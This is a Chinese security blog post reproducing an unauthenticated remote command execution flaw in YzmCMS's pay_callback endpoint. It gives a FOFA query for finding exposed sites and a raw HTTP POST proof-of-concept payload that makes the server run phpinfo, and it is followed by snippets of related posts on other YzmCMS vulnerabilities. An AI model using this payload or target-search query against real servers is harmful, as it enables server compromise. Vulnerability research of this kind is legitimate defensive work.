YzmCMS pay_callback 远程命令执行漏洞复现

原创 已于 2024-04-30 23:19:48 修改 · 2.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2024-04-30 23:19:35 首次发布
本文详细介绍了YzmCMS的pay_callback接口存在的远程命令执行漏洞,描述了漏洞概述、复现环境及过程,并给出了修复建议。攻击者可以未经验证地利用此漏洞执行任意系统命令,影响服务器安全。

0x01 产品简介

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。

0x02 漏洞概述

YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。

0x03 复现环境

FOFA:app="yzmcms"

0x04 漏洞复现

PoC

POST /pay/index/pay_callback.html HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded

out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现YzmCMS-远程命令执行-pay_callback
漏洞复现
06-19 1141
YZMCMS是一款轻量级、高效且开源的内容管理系统,它基于PHP+Mysql架构,采用自主研发的YZMPHP框架和MVC模式进行开发。该系统具有卓越的跨平台性能,能够稳定运行在Linux、Windows、MacOSX、Solaris等多种操作系统上。YzmCMS pay_callback 接口处存在远程命令执行漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
漏洞复现】I Doc View在线文档预览任意文件读取 1day
失心少年
12-14 859
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!I Doc View在线文档预览是一款在线文档预览系统,可以实现文档的预览及文档协作编辑功能。其存在代码执行漏洞,使得攻击者可以通过利用这个接口,触发服务器下载并解析恶意文件,从而导致远程命令执行漏洞
houyusen#poc#YzmCMS V5.4 后台getshell(二)1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
【代码审计】YzmCMS_PHP_v3.6 代码执行漏洞分析
12-03 4071

  
 0x00 环境准备
 YzmCMS官网:http://www.yzmcms.com/
 程序源码下载:http://pan.baidu.com/s/1pKA4u99
 测试网站首页:
  
 0x01 代码分析
 1、文件位置: /application/admin/controller/sql.cla...
YZMCMS中的SSRF漏洞代码审计详解
最新发布
你好!经典物理世界人类
10-27 1392
本文分析了YZMCMS系统中的SSRF漏洞审计过程,发现一个通过采集功能触发的二次SSRF漏洞。攻击者可在后台配置恶意列表页URL,注入包含特殊协议(如file://)的链接,系统会解析并请求该链接,导致服务器读取本地文件或访问内网资源。漏洞利用链涉及get_content()、get_all_url()等函数,最终在管理界面回显攻击结果。复现测试成功读取了Windows系统文件,证实漏洞存在且可利用性高。
YZMCMS V5.3后台 SSRF
weixin_30340819的博客
07-15 900
当改变命运的时刻降临,犹豫就会败北。 前言 此前在测试过程中遇到过此CMS,久攻不下,于是便尝试代码审计,不得不说这套CMS还是挺安全的,读起来也简单,也适合初学代码审计的同学去阅读,不过漏洞真的不多,本人绞尽脑汁终于算是审计出一个弱鸡漏洞。                    漏洞分析 漏洞位于 application\collection\controller\colle...
【代码审计】YzmCMS_PHP_v3.6 任意文件删除漏洞分析
12-03 1571
  0x00 环境准备 YzmCMS官网:http://www.yzmcms.com/ 程序源码下载:http://pan.baidu.com/s/1pKA4u99 测试网站首页:   0x01 代码分析 1、文件位置: /application/member/controller/member.class.php 第118-132行中: public functio...
网安之web攻防第四十天笔记
B_l_a_nk的博客
04-06 761
1、CSRF-审计-复现测试&同源策略 2、SSRF-审计-功能追踪&函数搜索
YzmCMS跨站脚本漏洞(CVE-2020-22394)复现
玄道的网安博客
11-28 5134
简介 YzmCMS基于 PHP 的轻量级开源内容管理系统。 漏洞概述 YzmCMS v5.5版本存在跨站脚本漏洞,该漏洞源于编辑器中的member contribution function包含一个跨站点脚本(XSS)漏洞。 影响版本 YzmCMS v5.5 环境搭建 到官网下载源码 https://www.yzmcms.com/ 好像官网最近访问不了了,放个百度网盘的 https://pan.baidu.com/s/1y8_4FrGlUUrV0-LaGWJhWA 安装完成后 .
cms[172.168.20.114] 漏洞复现
小同的博客
04-01 544
1.信息收集 简单信息收集IP:172.168.20.114 端口:8080 中间件:apache shiro 2.具体步骤 1.抓包工具:Burp suite 发现漏洞:反序列化漏洞 2.使用apache-shior漏洞探测工具扫描 第一步:爆破密钥 第二步:查看是否有回显 第三步:进行注入 反序列化工具地址:https://github.com/j1anFen/shiro_attack 下载步骤 第四步:使用刚才选择的连接工具:我这里是中国...
YzmCMS 7.0任意函数调用RCE 漏洞研究分析
shelter1234567的博客
05-07 4236
YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。YzmCMS某些接口调用了 db_pdo类的where方法 导致了远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。
YzmCMS信息管理系统 6.0
04-30
YzmCMS是一款轻量级信息管理系统,基于PHP+Mysql架构的,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,前台采用DIV+CSS设计,遵循WEB标准,兼容各种浏览器,后台界面设计简洁明了,完全采用PHP5面向对象设计,功能简单易具有良好的用户体验,稳定性好、扩展性及安全性强。YzmCMS 6.0 更新日志:2021-01-261.升级至YZMPHP框架2.5版本;2.精简优化系统文件,程序体积更小;3.模型字段新增多附件上传类型;4.系统新增锁屏功能;5.模板调用支持强制模板风格;6.新增获取会员中心消息数量及内容标题是否重复接口;7.系统分页新增跳转到指定页;8.修复会员邮箱可重复的bug;9.修复普通管理员系统管理无权限的问题;10.修复特殊情况下批量添加栏目失败的问题;11.测试发送邮件优化;12.系统函数库优化及其他细节改进;13.修复已知安全漏洞
YzmCMS轻量级开源CMS v5.3.zip
07-06
YzmCMS v5.3更新日志 1.多图上传新增远程地址! 2.修复MySQL5.7及以上SQL不兼容问题; 3.修复采集模块出错问题; 4.修复积分操作类不严谨导致的漏洞; 5.修复自定义伪静态后缀分页出错问题; 6.后台会员统计优化; 7.修复图片浏览插件安全问题; 8.新增附件上传类型; 9.系统函数库新增多个函数; 10.系统缓存文件命名优化; 本次更新优化内容包括但不限于以上所列举的项! YzmCMS特点 源码简洁 因为YzmCMS是由一人独自开发完成,所以系统所有源码风格全部统一,源码非常干净、无冗余代码! 开发灵活 YzmCMS系统采用MVC框架式开发,增加了程序的维护性、可扩展性,并采用模块化开发设计,使二次开发变得简单、容易。 开源 YzmCMS系统是100%开源的PHP程序,保证系统的代码更健壮和更安全。 轻量级 YzmCMS系统在保持强大的功能前提下,整体压缩包仅不足5MB,比同类CMS至少缩小一倍,是您可以快速了解和研究它! YzmCMS前台页面 YzmCMS后台管理 后台路径:域名/admin/ 用户名与密码:yzmcms(安装时可设置) 后台页面 相关阅读 同类推荐:CMS
漏洞复现YzmCMS pay_callback.html存在远程命令执行漏洞
失心少年
05-02 888
YzmCMS /pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令。
YZMCMS V5.3后台SSRF漏洞以及代码审计详解
2201_75489354的博客
11-18 987
作用是将$articleurl交给get_content处理,也就是交给crul_exec()处理,此时 $article 的值就是 crul_exec() 获取到的url内容。又将$content交给get_sub_content处理后重新赋值给$content。$url_start和$url_end,区域开始和区域结束不能为设置的值。$url_contain和$url_except依次判断是否满足要求。再发现$url交给get_content去处理并付给concent。
【靶场】yzmcms5.3.0 SSRF漏洞
qq_44936245的博客
06-07 441
本文通过YzmCMS5.3.0靶场测试演示了SSRF漏洞的利用过程。首先搭建靶场环境,上传测试文件ssrf2.html;然后在后台新增采集节点,通过测试采集功能成功读取系统hosts文件内容,确认存在SSRF漏洞漏洞成因在于系统未对目标地址进行有效过滤和限制,导致攻击者可利用服务器端请求伪造访问内部资源。该漏洞可能造成敏感信息泄露等安全风险。
最新系统漏洞--YzmCMS服务器端请求伪造漏洞
weixin_48555088的博客
10-21 1598
最新系统漏洞2021年10月21日 受影响系统: YzmCMS YzmCMS 5.8 描述: CVE(CAN) ID: CVE-2020-35970 YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统。 YzmCMS 5.8版本的后台收集管理功能存在服务器端请求伪造漏洞。攻击者可利用该漏洞任意读取文件。 <**> 建议: 厂商补丁: YzmCMS 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://github.com/yzmcms/yzmcms/
常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
2301_76631050的博客
08-04 2746
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)
static session_cb_vft_t ufs_cb_vft = { .session_accept_callback = ufs_ts_accept_callback, .session_disconnect_callback = ufs_ts_disconnect_callback, .session_connected_callback = ufs_ts_connected_callback, .add_segment_callback = ufs_add_segment_callback, .builtin_app_rx_callback = ufs_ts_rx_callback, .builtin_app_tx_callback = ufs_ts_tx_callback, .session_reset_callback = ufs_ts_reset_callback, .session_cleanup_callback = ufs_ts_cleanup, };解析
09-06
| `add_segment_callback` | 需要为会话新增内存段(如大文件传输时扩展缓冲区) | 分配/注册新的内存区域(通常与`svm`内存池交互) | | `builtin_app_rx_callback` | 收到数据包(已通过协议栈处理) | 应用层业务...
评论 8
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值